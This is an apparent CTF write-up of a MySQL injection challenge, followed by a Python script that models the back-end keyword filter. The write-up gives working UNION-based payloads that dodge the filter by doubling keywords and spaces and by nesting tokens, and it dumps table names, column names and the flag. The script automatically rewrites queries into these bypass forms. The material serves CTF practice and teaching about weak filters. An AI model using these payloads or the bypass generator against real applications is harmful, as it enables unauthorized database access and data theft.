The key point of this challenge is that the back end filters different keywords in different ways.
- Entering the value 1 returns:
ID: 1 name: baloteli
Entering 1' (make sure the quote is an ASCII single quote, not a full-width one from the input method) gives: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
So the parameter is a string type and there is an injection point.
- Since the challenge asks what is filtered, I simply entered several keywords together:
1 and or # -- union select from where
ID: 1 or where name: baloteli
- Now dump the table names. Before that, the number of columns the UNION needs should be determined; I just guessed 1 column:
1' ununionion seselectlect 1 frofromm information_schema.tables where '1'='1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ununionion seselectlect 1 frofromm information_schema.tables '1'='1'' at line 1
Awkward... the split keywords did not bypass the filter at all. My guess is that the filter matches from the start of a whole word, so the next test is to join two copies of the same keyword back to back. The error also shows that where is filtered (not sure why it survived in the first probe).
1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'unionselecttable_name frominformation_schema.tables where'1'='1'' at line 1
Another error, but the keywords have now got through the filter. They have been run together, though, so spaces are probably filtered as well. Try again with
1' unionunion  selectselect  table_name  fromfrom  information_schema.tables  wherewhere  '1'='1
i.e. two spaces in place of each one, the same method as for the keywords (every payload from here on uses doubled spaces). This returns a long list of results, among which one table name stands out:
ID: 1' union select table_name from information_schema.tables where '1'='1 name: flag
- Dump the column names:
1' unionunion  selectselect  column_name  fromfrom  information_schema.columns  wherewhere  table_name='flag
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from where table_name='flag'' at line 1
Where did information_schema.columns go? Probably filtered. Try doubling it:
1' unionunion  selectselect  column_name  fromfrom  information_schema.columnsinformation_schema.columns  wherewhere  table_name='flag
Still the same error, so it is not clear how the back end filters this one. Try the nested ab(abc)c form instead:
1' unionunion  selectselect  column_name  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where table_name='flag'' at line 1
Now I was stuck: what is this error? After a long think, maybe column_name is filtered too:
1' unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name='flag
ID: 1' union select column_name from information_schema.columns where table_name='flag name: baloteli
ID: 1' union select column_name from information_schema.columns where table_name='flag name: flag
ID: 1' union select column_name from information_schema.columns where table_name='flag name: id
The special column flag is found.
- Query the flag directly:
1' unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1
ID: 1' union select flag from flag where '1'='1 name: baloteli
ID: 1' union select flag from flag where '1'='1 name: flag{******}
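As an added illustration (not part of the original write-up and not the challenge's back-end code), the Python script below models a filter that behaves the way the probes above suggest and shows why each payload succeeded or failed. The model is an assumption: union, select, from and where are assumed to be deleted together with the single whitespace character after them, once each, which reproduces the error text unionselecttable_name frominformation_schema.tables where'1'='1 exactly, explains why doubling the spaces fixed it, and would also explain why the trailing where in the first probe survived (nothing followed it); information_schema.columns and column_name are assumed to be deleted everywhere in one left-to-right pass, which is why only the nested ab(abc)c form survived for those two. All function and variable names are mine.

```python
import re

# Reconstruction of the challenge's filter from the behaviour the write-up observed.
# ASSUMPTION for illustration only: the real back-end code is unknown.
#
# Group A: keyword plus the single whitespace character after it is deleted, but only
# the first occurrence of each. Group B: every occurrence is deleted in one pass.
GROUP_A = ["union", "select", "from", "where"]
GROUP_B = ["information_schema.columns", "column_name"]


def simulated_filter(payload: str) -> str:
    """Apply the assumed server-side filter to a raw parameter value."""
    for kw in GROUP_A:
        # count=1: only the first "keyword + whitespace" match is removed
        payload = re.sub(re.escape(kw) + r"\s", "", payload, count=1, flags=re.IGNORECASE)
    for tok in GROUP_B:
        # no count: every non-overlapping occurrence is removed, single pass
        payload = re.sub(re.escape(tok), "", payload, flags=re.IGNORECASE)
    return payload


def double_keywords(query: str) -> str:
    """Bypass for group A: write every keyword twice and every space twice, so the
    filter consumes one copy of each and the intended query is what remains."""
    for kw in GROUP_A:
        query = re.sub(r"\b" + kw + r"\b", kw + kw, query, flags=re.IGNORECASE)
    return query.replace(" ", "  ")


def nest_token(token: str, split_at: int) -> str:
    """Bypass for group B, the ab(abc)c form: the filter removes the inner copy and
    the two outer halves join back into the original token."""
    return token[:split_at] + token + token[split_at:]


def build_bypass(query: str) -> str:
    """Rewrite a plain injection query so that it survives simulated_filter()."""
    query = double_keywords(query)
    # Split points as used in the write-up: "information_schema.colu|mns", "column_nam|e".
    query = query.replace("information_schema.columns",
                          nest_token("information_schema.columns", 23))
    query = query.replace("column_name", nest_token("column_name", 10))
    return query


def normalize(sql: str) -> str:
    """Collapse whitespace so a filtered query can be compared with the intended one."""
    return " ".join(sql.split())


def survives(query: str) -> bool:
    """True if the bypassed form of `query` comes out of the filter as `query`."""
    return normalize(simulated_filter(build_bypass(query))) == normalize(query)


if __name__ == "__main__":
    # The write-up's own payloads, in the order they were tried.
    probes = [
        "1' ununionion seselectlect 1 frofromm information_schema.tables where '1'='1",
        "1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1",
        build_bypass("1' union select table_name from information_schema.tables where '1'='1"),
        build_bypass("1' union select column_name from information_schema.columns where table_name='flag"),
        build_bypass("1' union select flag from flag where '1'='1"),
    ]
    for p in probes:
        print(f"sent:   {p}\nserver: {simulated_filter(p)}\n")
```

Running the script prints each probe next to what the modelled filter would hand to MySQL; the first two reproduce the error fragments quoted above, and survives() checks that a plain query rebuilt with build_bypass() comes out intact. The practical lesson is that a strip-once filter and a strip-all filter need different bypasses, which is exactly why the doubled form worked for the keywords but only the nested form worked for column_name.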